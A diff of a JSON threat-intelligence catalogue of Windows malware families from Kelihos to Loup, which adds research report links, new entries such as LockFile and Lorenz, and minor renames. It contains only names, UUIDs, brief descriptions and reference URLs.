"description": "", @@ -19047,10 +21782,13 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kelihos", "https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/", + "https://www.justice.gov/opa/pr/russian-national-convicted-charges-relating-kelihos-botnet", + "https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/", "https://www.cyberscoop.com/doj-kelihos-botnet-peter-levashov-severa/", "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf", - "https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/", + "https://www.bleepingcomputer.com/news/security/us-convicts-russian-national-behind-kelihos-botnet-crypting-service/", "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/", + "https://www.crowdstrike.com/blog/farewell-to-kelihos-and-zombie-spider/", "https://en.wikipedia.org/wiki/Kelihos_botnet" ], "synonyms": [], @@ -19188,7 +21926,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kgh_spy", - "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite" + "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite", + "https://mp.weixin.qq.com/s/cbaePmZSk_Ob0r486RMXyw" ], "synonyms": [], "type": [] @@ -19240,6 +21979,19 @@ "uuid": "e81f3e3f-966c-4c99-8d4b-fc0a1d3bb027", "value": "KillDisk" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.killsomeone", + "https://news.sophos.com/en-us/2020/11/04/a-new-apt-uses-dll-side-loads-to-killlsomeone/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4d431d90-9dd5-4a77-9084-c010d6504f78", + "value": "KilllSomeOne" + }, { "description": "", "meta": { @@ -19261,12 +22013,14 @@ "https://blog.prevailion.com/2019/09/autumn-aperture-report.html", "https://metaswan.github.io/posts/Malware-Kimsuky-group's-resume-impersonation-malware", "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/", + "https://vblocalhost.com/presentations/operation-newton-hi-kimsuky-did-an-appleseed-really-fall-on-newtons-head/", "https://www.boho.or.kr/filedownload.do?attach_file_seq=2652&attach_file_id=EpF2652.pdf", "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure", "https://blog.alyac.co.kr/2347", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html", - "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-Kim.pdf" + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-Kim.pdf", + "https://inquest.net/blog/2021/08/23/kimsuky-espionage-campaign" ], "synonyms": [], "type": [] @@ -19274,6 +22028,19 @@ "uuid": "860643d6-5693-4e4e-ad1f-56c49faa10a7", "value": "Kimsuky" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kingminer", + "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-labs-kingminer-botnet-report.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "04d95343-fd44-471d-bfe7-908994a98ea7", + "value": "Kingminer" + }, { "description": "", "meta": { @@ -19306,7 +22073,7 @@ "type": [] }, "uuid": "6c585194-96d3-463d-ac21-aa942439cc26", - "value": "KIVARS" + "value": "KIVARS (Windows)" }, { "description": "Microsoft describes that threat actor ZINC is using Klackring as a malware dropped by ComeBacker, both being used to target security researchers.", @@ -19325,6 +22092,7 @@ "description": "KleptoParasite Stealer is advertised on Hackforums as a noob-friendly stealer. It is modular and comes with a IP retriever module, a Outlook stealer (32bit/64bit) and a Chrome/Firefox stealer (32bit/64bit). Earlier versions come bundled (loader plus modules), newer versions come with a loader (167k) that grabs the modules.\r\n\r\nPDB-strings suggest a relationship to JogLog v6 and v7.", "meta": { "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer", "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer" ], "synonyms": [ @@ -19336,6 +22104,19 @@ "uuid": "618b6f23-fc83-4aff-8b0a-7f7138be625c", "value": "KleptoParasite Stealer" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.klingon_rat", + "https://www.intezer.com/blog/malware-analysis/klingon-rat-holding-on-for-dear-life/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5f501884-2c72-4780-aaa6-c6b65e84fad8", + "value": "KlingonRAT" + }, { "description": "", "meta": { @@ -19351,7 +22132,7 @@ "value": "KLRD" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.knot", @@ -19361,7 +22142,7 @@ "type": [] }, "uuid": "0479b7cd-982e-430e-a96e-338aec8ae3cf", - "value": "Knot Ransomware" + "value": "Knot" }, { "description": "", @@ -19373,8 +22154,10 @@ "http://www.secureworks.com/research/threat-profiles/cobalt-ulster", "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf", "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", + "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", "https://www.secureworks.com/research/threat-profiles/gold-drake", + "http://www.secureworks.com/research/threat-profiles/gold-drake", "https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf", "https://github.com/zerosum0x0/koadic", "https://www.secureworks.com/research/threat-profiles/cobalt-ulster" @@ -19421,6 +22204,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.konni", + "https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/", "http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html", "https://blog.alyac.co.kr/2474", "http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html", @@ -19440,7 +22224,8 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.koobface" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.koobface", + "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf" ], "synonyms": [], "type": [] @@ -19456,6 +22241,7 @@ "https://unit42.paloaltonetworks.com/unit42-bisonal-malware-used-attacks-russia-south-korea/", "https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/", "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.93_ENG.pdf", + "https://www.youtube.com/watch?v=_fstHQSK-kk", "https://securitykitten.github.io/2014/11/25/curious-korlia.html", "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf", "http://asec.ahnlab.com/tag/Operation%20Bitter%20Biscuit", @@ -19468,6 +22254,7 @@ "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf", "https://web.archive.org/web/20130920120931/https:/www.rsaconference.com/writable/presentations/file_upload/cle-t04_final_v1.pdf", "https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/", + "https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf", "https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment" ], "synonyms": [ @@ -19505,16 +22292,18 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kpot_stealer", "https://blog.ensilo.com/game-of-trojans-dissecting-khalesi-infostealer-malware", - "https://isc.sans.edu/diary/26010", + "https://news.drweb.com/show/?i=13242&lng=en", "https://www.flashpoint-intel.com/blog/malware-campaign-targets-jaxx-cryptocurrency-wallet-users/", "https://isc.sans.edu/diary/25934", - "https://news.drweb.com/show/?i=13242&lng=en", + "https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/", + "https://isc.sans.edu/diary/26010", "https://www.proofpoint.com/us/threat-insight/post/new-kpot-v20-stealer-brings-zero-persistence-and-memory-features-silently-steal", "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://blag.nullteilerfrei.de/2020/04/26/use-ghidra-to-decrypt-strings-of-kpotstealer-malware/", - "https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/", - "https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/kpot2/KPOT.md" + "https://medium.com/s2wlab/deep-analysis-of-kpot-stealer-fb1d2be9c5dd", + "https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/kpot2/KPOT.md", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/" ], "synonyms": [ "Khalesi", @@ -19531,6 +22320,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kraken", "https://www.bleepingcomputer.com/news/security/kraken-cryptor-ransomware-masquerading-as-superantispyware-security-program/", + "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf", "https://securingtomorrow.mcafee.com/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/", "https://www.recordedfuture.com/kraken-cryptor-ransomware/" ], @@ -19575,6 +22365,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos", + "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware", "https://www.zdnet.com/article/security-researcher-malwaretech-pleads-guilty/", "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf", "https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack", @@ -19584,11 +22375,13 @@ "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/", "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/", "https://dissectingmalwa.re/osiris-the-god-of-afterlifeand-banking-malware.html", - "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/", + "https://therecord.media/osiris-banking-trojan-shuts-down-as-new-ares-variant-emerges/", "https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/", "https://twitter.com/3xp0rtblog/status/1294157781415743488", - "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/" + "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/", + "https://www.zscaler.com/blogs/security-research/ares-malware-grandson-kronos-banking-trojan" ], "synonyms": [ "Osiris" @@ -19686,11 +22479,12 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs", "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf", + "http://www.documentcloud.org/documents/6821581-FLASH-CP-000111-MW-Downgraded-Version.html", "https://blog.reversinglabs.com/blog/unpacking-kwampirs-rat", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", "https://www.zdnet.com/article/fbi-re-sends-alert-about-supply-chain-attacks-for-the-third-time-in-three-months/", "https://www.zdnet.com/article/fbi-warns-about-ongoing-attacks-against-software-supply-chain-companies/", "https://www.securityartwork.es/2019/03/13/orangeworm-group-kwampirs-analysis-update/", - "http://www.documentcloud.org/documents/6821581-FLASH-CP-000111-MW-Downgraded-Version.html", "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia" ], "synonyms": [], @@ -19811,7 +22605,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lcpdot", - "https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html" + "https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html", + "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf" ], "synonyms": [], "type": [] @@ -19820,7 +22615,7 @@ "value": "LCPDot" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.leakthemall", @@ -19830,7 +22625,7 @@ "type": [] }, "uuid": "526add8e-ed78-4e8e-8d4c-152570fe566e", - "value": "Leakthemall Ransomware" + "value": "Leakthemall" }, { "description": "", @@ -19881,6 +22676,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.liderc", + "https://about.fb.com/news/2021/07/taking-action-against-hackers-in-iran/", + "https://www.proofpoint.com/us/blog/threat-insight/i-knew-you-were-trouble-ta456-targets-defense-contractor-alluring-social-media", "https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html" ], "synonyms": [], @@ -19932,7 +22729,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lilith", "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-endtrade-finding-multi-stage-backdoors-that-tick/", - "https://github.com/werkamsus/Lilith" + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf", + "https://github.com/werkamsus/Lilith", + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479", + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt" ], "synonyms": [], "type": [] @@ -19971,12 +22771,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.limerat", - "https://www.youtube.com/watch?v=x-g-ZLeX8GM", + "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html", + "https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service", "https://github.com/NYAN-x-CAT/Lime-RAT/", + "https://www.youtube.com/watch?v=x-g-ZLeX8GM", "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns", "https://blog.yoroi.company/research/limerat-spreads-in-the-wild/", + "https://lab52.io/blog/literature-lover-targeting-colombia-with-limerat/", "https://blog.reversinglabs.com/blog/rats-in-the-library", - "https://lab52.io/blog/apt-c-36-recent-activity-analysis/" + "https://lab52.io/blog/apt-c-36-recent-activity-analysis/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt", + "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html" ], "synonyms": [], "type": [] @@ -20057,21 +22862,48 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit", - "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Lockbit.md", - "https://www.zdnet.com/article/ransomware-hits-helicopter-maker-kopter/", - "https://www.crypsisgroup.com/insights/ransomwares-new-trend-exfiltration-and-extortion", - "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", - "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", - "https://news.sophos.com/en-us/2020/04/24/lockbit-ransomware-borrows-tricks-to-keep-up-with-revil-and-maze/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://seguranca-informatica.pt/malware-analysis-details-on-lockbit-ransomware/", + "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/", + "https://www.trendmicro.com/en_us/research/21/h/lockbit-resurfaces-with-version-2-0-ransomware-detections-in-chi.html", + "https://yoroi.company/research/hunting-the-lockbit-gangs-exfiltration-infrastructures/", + "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", "https://id-ransomware.blogspot.com/search?q=lockbit", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1", + "https://blog.cyble.com/2021/08/16/a-deep-dive-analysis-of-lockbit-2-0/", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://www.netskope.com/blog/netskope-threat-coverage-lockbit", + "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-now-encrypts-windows-domains-using-group-policies/", + "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Lockbit.md", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1", + "https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/", + "https://www.crypsisgroup.com/insights/ransomwares-new-trend-exfiltration-and-extortion", + "https://medium.com/s2wlab/w4-july-en-story-of-the-week-ransomware-on-the-darkweb-c61965d0386a", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://therecord.media/australian-cybersecurity-agency-warns-of-spike-in-lockbit-ransomware-attacks/", + "https://www.prodaft.com/m/reports/LockBit_Case_Report___TLPWHITE.pdf", + "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/", + "https://www.bleepingcomputer.com/news/security/uk-rail-network-merseyrail-likely-hit-by-lockbit-ransomware/", + "https://securityintelligence.com/posts/lockbit-ransomware-attacks-surge-affiliate-recruitment/", + "https://www.advanced-intel.com/post/from-russia-with-lockbit-ransomware-inside-look-preventive-solutions", + "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf", + "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", + "https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/", + "https://news.sophos.com/en-us/2020/04/24/lockbit-ransomware-borrows-tricks-to-keep-up-with-revil-and-maze/", + "https://medium.com/@amgedwageh/lockbit-ransomware-analysis-notes-93a542fc8511", + "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel", + "https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/481/original/010421_LockBit_Interview.pdf", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", + "https://www.bleepingcomputer.com/news/security/ransomware-attack-hits-italys-lazio-region-affects-covid-19-site/", + "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-recruiting-insiders-to-breach-corporate-networks/", "https://blog.lexfo.fr/lockbit-malware.html", "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/481/original/010421_LockBit_Interview.pdf", - "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1", + "https://therecord.media/missed-opportunity-bug-in-lockbit-ransomware-allowed-free-decryptions/", + "https://www.zdnet.com/article/ransomware-hits-helicopter-maker-kopter/", + "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "https://news.sophos.com/en-us/2020/10/21/lockbit-attackers-uses-automated-attack-tools-to-identify-tasty-targets", - "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/" + "https://www.bleepingcomputer.com/news/security/energy-group-erg-reports-minor-disruptions-after-ransomware-attack/" ], "synonyms": [ "ABCD Ransomware" @@ -20088,6 +22920,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockergoga", "https://www.nrk.no/norge/skreddersydd-dobbeltangrep-mot-hydro-1.14480202", "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://dragos.com/wp-content/uploads/Spyware-Stealer-Locker-Wiper-LockerGoga-Revisited.pdf", "https://www.abuse.io/lockergoga.txt", "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", @@ -20098,7 +22931,7 @@ "https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", "https://www.youtube.com/watch?v=o6eEN0mUakM", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/", "https://www.helpnetsecurity.com/2019/04/02/aurora-decrypter-mira-decrypter/", "https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/" @@ -20109,6 +22942,24 @@ "uuid": "a4a6469d-6753-4195-9635-f11d458525f9", "value": "LockerGoga" }, + { + "description": "A ransomware first observed in July 2021.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockfile", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows", + "https://news.sophos.com/en-us/2021/08/27/lockfile-ransomwares-box-of-tricks-intermittent-encryption-and-evasion/", + "https://blog.cyble.com/2021/08/25/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/", + "https://twitter.com/VirITeXplorer/status/1428750497872232459", + "https://www.csoonline.com/article/3631517/lockfile-ransomware-uses-intermittent-encryption-to-evade-detection.html", + "https://thehackernews.com/2021/08/lockfile-ransomware-bypasses-protection.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "97879260-ee50-4c7e-8d87-4bb134d1fdaf", + "value": "LockFile" + }, { "description": "Locky is a high profile ransomware family that first appeared in early 2016 and was observed being active until end of 2017. It encrypts files on the victim system and asks for ransom in order to have back original files. In its first version it added a .locky extension to the encrypted files, and in recent versions it added the .lukitus extension. The ransom amount is defined in BTC and depends on the actor.", "meta": { @@ -20128,6 +22979,7 @@ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf", "https://vixra.org/pdf/2002.0183v1.pdf", "https://blog.malwarebytes.com/threat-analysis/2017/01/locky-bart-ransomware-and-backend-server-analysis/", "https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-the-lukitus-extension-for-encrypted-files/", @@ -20267,33 +23119,42 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws", + "https://www.youtube.com/watch?v=K3Yxu_9OUxU", "https://isc.sans.edu/diary/24372", "http://www.malware-traffic-analysis.net/2017/06/12/index.html", "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads", - "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", + "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/evasive-urls-in-spam-part-2/", - "https://github.com/R3MRUM/loki-parse", + "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html", "https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/", "https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/", + "https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html", "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850", "https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file", + "http://reversing.fun/reversing/2021/06/08/lokibot.html", "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/", "https://www.virusbulletin.com/virusbulletin/2020/02/lokibot-dissecting-cc-panel-deployments/", "https://medium.com/@paul.k.burbage/the-tale-of-the-pija-droid-firefinch-4d304fde5ca2", - "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", - "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html", + "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", + "https://github.com/R3MRUM/loki-parse", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", "https://lab52.io/blog/a-twisted-malware-infection-chain/", + "https://www.youtube.com/watch?v=-FxyzuRv6Wg", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://news.sophos.com/en-us/2020/05/14/raticate/", + "http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html", "https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf", - "https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html", + "https://isc.sans.edu/diary/27282", + "https://www.trendmicro.com/en_us/research/21/h/new-campaign-sees-lokibot-delivered-via-multiple-methods.html", "https://clickallthethings.wordpress.com/2020/03/31/lokibot-getting-equation-editor-shellcode/", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/loki-info-stealer-propagates-through-lzh-files", "https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html", "https://www.lastline.com/blog/password-stealing-malware-loki-bot/", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/", "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://www.youtube.com/watch?v=N0wAh26wShE", "https://marcoramilli.com/2019/10/28/sweed-targeting-precision-engineering-companies-in-italy/", "https://phishme.com/loki-bot-malware/", "https://securelist.com/loki-bot-stealing-corporate-passwords/87595/" @@ -20330,6 +23191,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.longwatch", + "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae", "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html" ], "synonyms": [], @@ -20352,7 +23214,7 @@ "type": [] }, "uuid": "4b83ba50-7d50-48b4-bb70-fcbcacd23340", - "value": "looChiper Ransomware" + "value": "looChiper" }, { "description": "", @@ -20362,6 +23224,7 @@ "https://threatgen.com/taking-a-closer-look-at-the-lookback-malware-campaign-part-1/", "https://nao-sec.org/2021/01/royal-road-redive.html", "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", + "https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-talonite/", "https://www.proofpoint.com/us/threat-insight/post/lookback-forges-ahead-continued-targeting-united-states-utilities-sector-reveals", "https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks", "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new", @@ -20392,6 +23255,22 @@ "uuid": "fa61a690-fd9c-4036-97fb-bf3674aa60b2", "value": "L0rdix" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lorenz", + "https://www.bleepingcomputer.com/news/security/meet-lorenz-a-new-ransomware-gang-targeting-the-enterprise/", + "https://twitter.com/AltShiftPrtScn/status/1423190900516302860?s=20", + "https://therecord.media/free-decrypter-available-for-lorenz-ransomware/", + "https://www.tesorion.nl/en/posts/lorenz-ransomware-analysis-and-a-free-decryptor/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3ec79052-d8c0-49b2-9204-42f9d8f035f8", + "value": "Lorenz" + }, { "description": "Frank Boldewin describes Loup as a small cli-tool to cash out NCR devices (ATM).", "meta": { @@ -20412,7 